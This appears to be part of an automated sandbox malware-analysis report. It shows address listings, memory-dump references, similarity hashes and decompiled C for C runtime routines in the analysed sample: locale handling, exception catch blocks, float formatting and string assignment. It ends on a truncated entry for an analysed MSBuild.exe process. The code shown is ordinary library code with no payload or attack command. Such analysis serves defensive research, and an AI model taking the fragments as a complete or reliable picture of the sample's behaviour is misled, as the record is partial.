0x000c3048
0x000c3030
0x000c3035
0x00000000
0x00000000
0x000c303a
0x000c3055
0x000c305a
0x000c305d
0x000c3064
0x000c3083
0x000c308a
0x000c308c
0x000c30d0
0x000c30d8
0x000c30ed
0x000c30ef
0x000c30ff
0x000c30ff
0x000c3103
0x000c3105
0x000c3108
0x000c3108
0x000c3108
0x000c3108
0x00000000
0x000c310e
0x000c30f1
0x000c30f1
0x000c30f6
0x000c30f6
0x000c30f9
0x00000000
0x000c30f9
0x000c308e
0x000c3091
0x000c3095
0x000c30be
0x000c30be
0x000c30c1
0x000c30c1
0x00000000
0x00000000
0x000c30c3
0x000c30c7
0x00000000
0x00000000
0x000c30c9
0x000c30c9
0x00000000
0x000c30c9
0x000c3097
0x000c309a
0x00000000
0x00000000
0x000c309e
0x000c30b1
0x000c30b7
0x000c30ba
0x000c30bc
0x00000000
0x00000000
0x00000000
0x000c30bc
0x000c3066
0x000c3069
0x000c306b
0x000c3070
0x000c3070
0x000c3075
0x00000000
0x000c3075
0x000c303c
0x000c3041
0x000c3045
0x000c3045
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000C3055
__isleadbyte_l.LIBCMT ref: 000C3083
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 000C30B1
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 000C30E7

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d465dc3e03f14899ec2b57114a586f2b72cb0a55f65b46ceb7d02f087657b689
Instruction ID: b71de0cd37f6c2c98a6d8de9a738b44e4ba9178f46383718ca863e81670376c4
Opcode Fuzzy Hash: d465dc3e03f14899ec2b57114a586f2b72cb0a55f65b46ceb7d02f087657b689
Instruction Fuzzy Hash: 6031ED32610246AFDB618F74C855FAE7BE5BF41710F25C52CF8218B0A2E731EA80DB90

Uniqueness

Uniqueness Score: -1.00%

Function 000B6F1D, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E000B6F1D(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_t31 = __esi;
				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E000B7545(__ebx, _t30, __esi, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E000B59CE(_t28);
				_push(_t31);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E000B77A6(_t27, _t29, _t30, _t32, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E000B6D0F(_t27, _t29, _t30, _t32, _t37);
				if(_t25 != 0) {
					E000B599E(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x000b6f1d
0x000b6f1d
0x000b6f1d
0x000b6f20
0x000b6f25
0x000b6f28
0x000b6f2a
0x000b6f2d
0x000b6f30
0x000b6f31
0x000b6f34
0x000b6f39
0x000b6f39
0x000b6f3c
0x000b6f40
0x000b6f43
0x000b6f48
0x000b6f45
0x000b6f45
0x000b6f45
0x000b6f4b
0x000b6f50
0x000b6f51
0x000b6f54
0x000b6f56
0x000b6f59
0x000b6f5c
0x000b6f5d
0x000b6f65
0x000b6f6a
0x000b6f6e
0x000b6f74
0x000b6f77
0x000b6f7a
0x000b6f7d
0x000b6f7e
0x000b6f81
0x000b6f8c
0x000b6f90
0x00000000
0x000b6f90
0x000b6f97

APIs

___BuildCatchObject.LIBCMT ref: 000B6F34

Part of subcall function 000B7545: ___AdjustPointer.LIBCMT ref: 000B758E

_UnwindNestedFrames.LIBCMT ref: 000B6F4B
___FrameUnwindToState.LIBCMT ref: 000B6F5D
CallCatchBlock.LIBCMT ref: 000B6F81

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: c150b4d4ee6c520d1deb80d80a3620b3d7d596ab6814b6957290872c38c5402e
Instruction ID: a5cb98bcfe6a265134f4c992fc54989109948bb2d9ebb8e504c063137336a2b0
Opcode Fuzzy Hash: c150b4d4ee6c520d1deb80d80a3620b3d7d596ab6814b6957290872c38c5402e
Instruction Fuzzy Hash: AF010C32004109FBCF129F55DC05EDA3FBAFF88754F154054F91866122D776E861DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000BF722, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000BF722(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t28 = __edx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E000BFC6F(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E000BF7A8(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E000BFEE4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E000BFE25(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x000bf722
0x000bf725
0x000bf72b
0x000bf79e
0x00000000
0x000bf732
0x000bf732
0x000bf735
0x000bf750
0x000bf753
0x000bf773
0x000bf785
0x000bf755
0x000bf755
0x000bf758
0x00000000
0x000bf75a
0x000bf76c
0x000bf76c
0x000bf758
0x000bf7a3
0x000bf7a7
0x000bf737
0x000bf74f
0x000bf74f
0x000bf735

APIs

__cftof_l.LIBCMT ref: 000BF746

Part of subcall function 000BFE25: __fltout2.LIBCMT ref: 000BFE4E

__cftog_l.LIBCMT ref: 000BF76C
__cftoe_l.LIBCMT ref: 000BF79E

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 1058779624abd1eb0f0b8e6e171218de798973b2f419acbd1b3b527576c78edb
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 21014C3208414EBBCF525E84DC458FE3F66BB18354B5984A5FE189A031D637CAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 000BC32C, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E000BC32C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0xcd4e0);
				E000BAF40(__ebx, __edi, __esi);
				_t31 = E000BAA50(__edx, __edi, _t35);
				_t25 =  *0xcfd54; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E000B6AC0(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xcfda4; // 0x13d4108
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xd00a0;
								if(__eflags != 0) {
									E000B4434(_t33);
								}
							}
						}
						_t20 =  *0xcfda4; // 0x13d4108
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0xcfda4; // 0x13d4108
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E000BC3C8();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E000BAC5E(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E000BAF85(_t33);
			}

0x000bc32c
0x000bc32c
0x000bc32c
0x000bc32c
0x000bc32e
0x000bc333
0x000bc33d
0x000bc33f
0x000bc348
0x000bc369
0x000bc36f
0x000bc373
0x000bc376
0x000bc379
0x000bc37f
0x000bc381
0x000bc383
0x000bc38c
0x000bc38e
0x000bc390
0x000bc396
0x000bc399
0x000bc39e
0x000bc396
0x000bc38e
0x000bc39f
0x000bc3a4
0x000bc3a7
0x000bc3ad
0x000bc3b1
0x000bc3b1
0x000bc3b7
0x000bc3be
0x000bc350
0x000bc350
0x000bc350
0x000bc353
0x000bc355
0x000bc359
0x000bc35e
0x000bc366

APIs

Part of subcall function 000BAA50: __getptd_noexit.LIBCMT ref: 000BAA51

__lock.LIBCMT ref: 000BC369
InterlockedDecrement.KERNEL32(?), ref: 000BC386
_free.LIBCMT ref: 000BC399
InterlockedIncrement.KERNEL32(013D4108), ref: 000BC3B1

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: e4feb1048a496242782d7f938fe1cd1b6d430e1d965f93fe3dba1e0c0537eb5e
Instruction ID: 49824c03b3e9648b067f610a13ee467bc79551ee6558b58875851f105986e8fa
Opcode Fuzzy Hash: e4feb1048a496242782d7f938fe1cd1b6d430e1d965f93fe3dba1e0c0537eb5e
Instruction Fuzzy Hash: B401D631A01712EBE760AB64C805FED77E0BF05F11F458025E805A72A2CB786A40CBD7

Uniqueness

Uniqueness Score: -1.00%

Function 000B1CD0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E000B1CD0(intOrPtr* __ecx, unsigned int _a4, intOrPtr* _a8, void _a12) {
				intOrPtr _v0;
				intOrPtr _v4;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v33;
				intOrPtr* _v40;
				intOrPtr* _v44;
				signed int _v60;
				intOrPtr _v84;
				intOrPtr* _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t79;
				intOrPtr* _t84;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr* _t100;
				intOrPtr _t103;
				char* _t112;
				intOrPtr _t115;
				intOrPtr _t125;
				unsigned int _t129;
				intOrPtr _t130;
				void* _t132;
				intOrPtr* _t141;
				intOrPtr* _t142;
				unsigned int _t144;
				intOrPtr* _t147;
				intOrPtr* _t148;
				intOrPtr _t156;
				intOrPtr* _t157;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				signed int _t165;
				intOrPtr _t168;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr* _t187;
				intOrPtr _t204;
				intOrPtr _t205;
				intOrPtr _t207;
				intOrPtr _t208;

				_t129 = _a4;
				_t161 =  *((intOrPtr*)(_t129 + 0x10));
				_t184 = __ecx;
				_t141 = _a8;
				if(_t161 < _t141) {
					E000B37B5(__eflags, "invalid string position");
					goto L25;
				} else {
					_t161 =  <  ? _a12 : _t161 - _t141;
					if(__ecx != _t129) {
						__eflags = _t161 - 0xfffffffe;
						if(__eflags > 0) {
							goto L26;
						} else {
							_t115 =  *((intOrPtr*)(__ecx + 0x14));
							__eflags = _t115 - _t161;
							if(_t115 >= _t161) {
								__eflags = _t161;
								if(_t161 != 0) {
									goto L9;
								} else {
									 *((intOrPtr*)(__ecx + 0x10)) = _t161;
									__eflags = _t115 - 0x10;
									if(_t115 < 0x10) {
										 *((char*)(__ecx)) = 0;
										return __ecx;
									} else {
										 *((char*)( *__ecx)) = 0;
										return __ecx;
									}
								}
							} else {
								_push( *((intOrPtr*)(__ecx + 0x10)));
								_push(_t161);
								L65();
								_t141 = _a8;
								__eflags = _t161;
								if(_t161 == 0) {
									L23:
									return _t184;
								} else {
									L9:
									__eflags =  *((intOrPtr*)(_t129 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t129 + 0x14)) >= 0x10) {
										_t129 =  *_t129;
									}
									__eflags =  *((intOrPtr*)(_t184 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t184 + 0x14)) < 0x10) {
										_t157 = _t184;
									} else {
										_t157 =  *_t184;
									}
									__eflags = _t161;
									if(_t161 != 0) {
										E000B4F10(_t157, _t129 + _t141, _t161);
									}
									__eflags =  *((intOrPtr*)(_t184 + 0x14)) - 0x10;
									 *((intOrPtr*)(_t184 + 0x10)) = _t161;
									if( *((intOrPtr*)(_t184 + 0x14)) < 0x10) {
										 *((char*)(_t184 + _t161)) = 0;
										goto L23;
									} else {
										 *((char*)( *_t184 + _t161)) = 0;
										return _t184;
									}
								}
							}
						}
					} else {
						_t125 = _t161 + _t141;
						if( *((intOrPtr*)(__ecx + 0x10)) < _t125) {
							L25:
							E000B37B5(__eflags, "invalid string position");
							L26:
							_push("string too long");
							E000B3787(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t204 = _t207;
							_push(_t184);
							_push(_t161);
							_t162 = _v24;
							_t185 = _t141;
							__eflags = _t162 - 0xffffffff;
							if(__eflags == 0) {
								_push("string too long");
								E000B3787(__eflags);
								goto L48;
							} else {
								__eflags = _t162 - 0xfffffffe;
								if(__eflags > 0) {
									L48:
									_push("string too long");
									E000B3787(__eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t204);
									_t205 = _t207;
									_push(_t185);
									_t186 = _t141;
									_t142 = _v44;
									_push(_t162);
									_t163 =  *((intOrPtr*)(_t186 + 0x10));
									__eflags = _t163 - _t142;
									if(__eflags < 0) {
										E000B37B5(__eflags, "invalid string position");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t205);
										_push(0xffffffff);
										_push(E000C6F00);
										_push( *[fs:0x0]);
										 *[fs:0x0] = _t207;
										_t208 = _t207 - 0x14;
										_push(_t129);
										_push(_t186);
										_push(_t163);
										_v84 = _t208;
										_t187 = _t142;
										_v96 = _t187;
										_t79 = _v60;
										_t165 = _t79 | 0x0000000f;
										__eflags = _t165 - 0xfffffffe;
										if(_t165 <= 0xfffffffe) {
											_t129 =  *(_t187 + 0x14);
											_t144 = _t129 >> 1;
											_t154 = 0xaaaaaaab * _t165 >> 0x20 >> 1;
											__eflags = _t144 - 0xaaaaaaab * _t165 >> 0x20 >> 1;
											if(_t144 > 0xaaaaaaab * _t165 >> 0x20 >> 1) {
												__eflags = _t129 - 0xfffffffe - _t144;
												_t165 = _t144 + _t129;
												if(_t129 > 0xfffffffe - _t144) {
													_t165 = 0xfffffffe;
												}
											}
										} else {
											_t165 = _t79;
										}
										_v20 = 0;
										_t60 = _t165 + 1; // 0xffffffff
										_v40 = E000B20B0(_t129, _t154, _t165, _t187, _t60);
										_v20 = 0xffffffff;
										_t130 = _v4;
										__eflags = _t130;
										if(_t130 != 0) {
											__eflags =  *(_t187 + 0x14) - 0x10;
											if( *(_t187 + 0x14) < 0x10) {
												_t147 = _t187;
											} else {
												_t147 =  *_t187;
											}
											__eflags = _t130;
											if(_t130 != 0) {
												E000B4F10(_t83, _t147, _t130);
												_t208 = _t208 + 0xc;
											}
										}
										__eflags =  *(_t187 + 0x14) - 0x10;
										if( *(_t187 + 0x14) >= 0x10) {
											L000B45D5( *_t187);
										}
										 *_t187 = 0;
										_t84 = _v40;
										 *_t187 = _t84;
										 *(_t187 + 0x14) = _t165;
										 *((intOrPtr*)(_t187 + 0x10)) = _t130;
										__eflags = _t165 - 0x10;
										if(_t165 >= 0x10) {
											_t187 = _t84;
										}
										 *((char*)(_t187 + _t130)) = 0;
										 *[fs:0x0] = _v28;
										return _t84;
									} else {
										_t156 = _v0;
										__eflags = _t163 - _t142 - _t156;
										if(_t163 - _t142 > _t156) {
											__eflags = _t156;
											if(_t156 == 0) {
												L63:
												return _t186;
											} else {
												__eflags =  *((intOrPtr*)(_t186 + 0x14)) - 0x10;
												if( *((intOrPtr*)(_t186 + 0x14)) < 0x10) {
													_t92 = _t186;
												} else {
													_t92 =  *_t186;
												}
												_t168 = _t163 - _t156;
												_push(_t129);
												_t132 = _t92 + _t142;
												_t94 = _t168 - _t142;
												__eflags = _t94;
												if(_t94 != 0) {
													E000B3DF0(_t132, _t132 + _t156, _t94);
												}
												__eflags =  *((intOrPtr*)(_t186 + 0x14)) - 0x10;
												 *((intOrPtr*)(_t186 + 0x10)) = _t168;
												if( *((intOrPtr*)(_t186 + 0x14)) < 0x10) {
													 *((char*)(_t186 + _t168)) = 0;
													goto L63;
												} else {
													 *((char*)( *_t186 + _t168)) = 0;
													return _t186;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t186 + 0x14)) - 0x10;
											 *((intOrPtr*)(_t186 + 0x10)) = _t142;
											if( *((intOrPtr*)(_t186 + 0x14)) < 0x10) {
												_t100 = _t186;
												 *((char*)(_t100 + _t142)) = 0;
												return _t100;
											} else {
												 *((char*)( *_t186 + _t142)) = 0;
												return _t186;
											}
										}
									}
								} else {
									_t103 =  *((intOrPtr*)(_t185 + 0x14));
									__eflags = _t103 - _t162;
									if(_t103 >= _t162) {
										__eflags = _t162;
										if(_t162 != 0) {
											goto L31;
										} else {
											 *((intOrPtr*)(_t185 + 0x10)) = _t162;
											__eflags = _t103 - 0x10;
											if(_t103 < 0x10) {
												_t112 = _t185;
												 *_t112 = 0;
												return _t112;
											} else {
												 *((char*)( *_t185)) = 0;
												return _t185;
											}
										}
									} else {
										_push( *((intOrPtr*)(_t185 + 0x10)));
										_push(_t162);
										L65();
										__eflags = _t162;
										if(_t162 == 0) {
											L46:
											return _t185;
										} else {
											L31:
											__eflags = _t162 - 1;
											if(_t162 != 1) {
												__eflags =  *((intOrPtr*)(_t185 + 0x14)) - 0x10;
												if( *((intOrPtr*)(_t185 + 0x14)) < 0x10) {
													_t148 = _t185;
												} else {
													_t148 =  *_t185;
												}
												E000B6A30(_t148, _a4, _t162);
											} else {
												__eflags =  *((intOrPtr*)(_t185 + 0x14)) - 0x10;
												if( *((intOrPtr*)(_t185 + 0x14)) < 0x10) {
													 *_t185 = _a4;
												} else {
													 *((char*)( *_t185)) = _a4;
												}
											}
											__eflags =  *((intOrPtr*)(_t185 + 0x14)) - 0x10;
											 *((intOrPtr*)(_t185 + 0x10)) = _t162;
											if( *((intOrPtr*)(_t185 + 0x14)) < 0x10) {
												 *((char*)(_t185 + _t162)) = 0;
												goto L46;
											} else {
												 *((char*)( *_t185 + _t162)) = 0;
												return _t185;
											}
										}
									}
								}
							}
						} else {
							 *((intOrPtr*)(__ecx + 0x10)) = _t125;
							if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
								_push(_t141);
								_push(0);
								 *((char*)(_t125 + __ecx)) = 0;
								L49();
								return __ecx;
							} else {
								_push(_t141);
								_push(0);
								 *((char*)(_t125 +  *__ecx)) = 0;
								L49();
								return __ecx;
							}
						}
					}
				}
			}

0x000b1cd4
0x000b1cd9
0x000b1cdc
0x000b1cde
0x000b1ce3
0x000b1dd7
0x00000000
0x000b1ce9
0x000b1cee
0x000b1cf4
0x000b1d3d
0x000b1d40
0x00000000
0x000b1d46
0x000b1d46
0x000b1d49
0x000b1d4b
0x000b1d71
0x000b1d73
0x00000000
0x000b1d75
0x000b1d75
0x000b1d78
0x000b1d7b
0x000b1d8f
0x000b1d94
0x000b1d7d
0x000b1d80
0x000b1d88
0x000b1d88
0x000b1d7b
0x000b1d4d
0x000b1d4d
0x000b1d52
0x000b1d53
0x000b1d58
0x000b1d5b
0x000b1d5d
0x000b1dc9
0x000b1dcf
0x000b1d5f
0x000b1d5f
0x000b1d5f
0x000b1d63
0x000b1d65
0x000b1d65
0x000b1d67
0x000b1d6b
0x000b1d97
0x000b1d6d
0x000b1d6d
0x000b1d6d
0x000b1d99
0x000b1d9b
0x000b1da3
0x000b1da8
0x000b1dab
0x000b1daf
0x000b1db2
0x000b1dc5
0x00000000
0x000b1db4
0x000b1db6
0x000b1dc0
0x000b1dc0
0x000b1db2
0x000b1d5d
0x000b1d4b
0x000b1cf6
0x000b1cf6
0x000b1cfc
0x000b1ddc
0x000b1de1
0x000b1de6
0x000b1de6
0x000b1deb
0x000b1df0
0x000b1df1
0x000b1df2
0x000b1df3
0x000b1df4
0x000b1df5
0x000b1df6
0x000b1df7
0x000b1df8
0x000b1df9
0x000b1dfa
0x000b1dfb
0x000b1dfc
0x000b1dfd
0x000b1dfe
0x000b1dff
0x000b1e01
0x000b1e03
0x000b1e04
0x000b1e05
0x000b1e08
0x000b1e0a
0x000b1e0d
0x000b1eb1
0x000b1eb6
0x00000000
0x000b1e13
0x000b1e13
0x000b1e16
0x000b1ebb
0x000b1ebb
0x000b1ec0
0x000b1ec5
0x000b1ec6
0x000b1ec7
0x000b1ec8
0x000b1ec9
0x000b1eca
0x000b1ecb
0x000b1ecc
0x000b1ecd
0x000b1ece
0x000b1ecf
0x000b1ed0
0x000b1ed1
0x000b1ed3
0x000b1ed4
0x000b1ed6
0x000b1ed9
0x000b1eda
0x000b1edd
0x000b1edf
0x000b1f64
0x000b1f69
0x000b1f6a
0x000b1f6b
0x000b1f6c
0x000b1f6d
0x000b1f6e
0x000b1f6f
0x000b1f70
0x000b1f73
0x000b1f75
0x000b1f80
0x000b1f81
0x000b1f88
0x000b1f8b
0x000b1f8c
0x000b1f8d
0x000b1f8e
0x000b1f91
0x000b1f93
0x000b1f96
0x000b1f9b
0x000b1f9e
0x000b1fa1
0x000b1fa7
0x000b1fac
0x000b1fb5
0x000b1fb7
0x000b1fb9
0x000b1fc2
0x000b1fc4
0x000b1fc7
0x000b1fc9
0x000b1fc9
0x000b1fc7
0x000b1fa3
0x000b1fa3
0x000b1fa3
0x000b1fce
0x000b1fd5
0x000b1fe1
0x000b1fe4
0x000b2024
0x000b2027
0x000b2029
0x000b202b
0x000b202f
0x000b2035
0x000b2031
0x000b2031
0x000b2031
0x000b2037
0x000b2039
0x000b203e
0x000b2043
0x000b2043
0x000b2039
0x000b2046
0x000b204a
0x000b204e
0x000b2053
0x000b2056
0x000b2059
0x000b205c
0x000b205e
0x000b2061
0x000b2064
0x000b2067
0x000b2069
0x000b2069
0x000b206b
0x000b2072
0x000b207f
0x000b1ee1
0x000b1ee1
0x000b1ee8
0x000b1eea
0x000b1f0f
0x000b1f11
0x000b1f57
0x000b1f5c
0x000b1f13
0x000b1f13
0x000b1f17
0x000b1f1d
0x000b1f19
0x000b1f19
0x000b1f19
0x000b1f1f
0x000b1f21
0x000b1f22
0x000b1f27
0x000b1f27
0x000b1f29
0x000b1f31
0x000b1f36
0x000b1f39
0x000b1f3d
0x000b1f41
0x000b1f53
0x00000000
0x000b1f43
0x000b1f45
0x000b1f4e
0x000b1f4e
0x000b1f41
0x000b1eec
0x000b1eec
0x000b1ef0
0x000b1ef3
0x000b1f03
0x000b1f06
0x000b1f0c
0x000b1ef5
0x000b1ef8
0x000b1f00
0x000b1f00
0x000b1ef3
0x000b1eea
0x000b1e1c
0x000b1e1c
0x000b1e1f
0x000b1e21
0x000b1e44
0x000b1e46
0x00000000
0x000b1e48
0x000b1e48
0x000b1e4b
0x000b1e4e
0x000b1e5d
0x000b1e60
0x000b1e65
0x000b1e50
0x000b1e53
0x000b1e5a
0x000b1e5a
0x000b1e4e
0x000b1e23
0x000b1e23
0x000b1e26
0x000b1e27
0x000b1e2c
0x000b1e2e
0x000b1ea9
0x000b1eae
0x000b1e30
0x000b1e30
0x000b1e30
0x000b1e33
0x000b1e71
0x000b1e75
0x000b1e7b
0x000b1e77
0x000b1e77
0x000b1e77
0x000b1e84
0x000b1e35
0x000b1e35
0x000b1e39
0x000b1e6d
0x000b1e3b
0x000b1e40
0x000b1e40
0x000b1e39
0x000b1e8c
0x000b1e90
0x000b1e93
0x000b1ea5
0x00000000
0x000b1e95
0x000b1e97
0x000b1ea0
0x000b1ea0
0x000b1e93
0x000b1e2e
0x000b1e21
0x000b1e16
0x000b1d02
0x000b1d06
0x000b1d09
0x000b1d24
0x000b1d27
0x000b1d2b
0x000b1d2f
0x000b1d3a
0x000b1d0b
0x000b1d0d
0x000b1d0e
0x000b1d12
0x000b1d16
0x000b1d21
0x000b1d21
0x000b1d09
0x000b1cfc
0x000b1cf4

APIs

_memmove.LIBCMT ref: 000B1DA3

Strings

string too long, xrefs: 000B1DE6
invalid string position, xrefs: 000B1DD2, 000B1DDC

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 7ca08761dfa5da33bd3c479d3eaa81e21b00374debfd7cb09166f83616011014
Instruction ID: ae93f915f3476b4e4697e7059929f30181abf7d23262e41f73ffb8490f9ee8e1
Opcode Fuzzy Hash: 7ca08761dfa5da33bd3c479d3eaa81e21b00374debfd7cb09166f83616011014
Instruction Fuzzy Hash: 8131C3723043109BD7349E5CE890FDAF7EAEB91760F500A2FE5558B292D7B19840C7A1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exe PID: 2540 Parent PID: 5492 MSBuild.exeCOMMON

Executed Functions

Function 0ADB4ED0, Relevance: 23.6, APIs: 1, Strings: 12, Instructions: 829libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0ADB5625

Strings

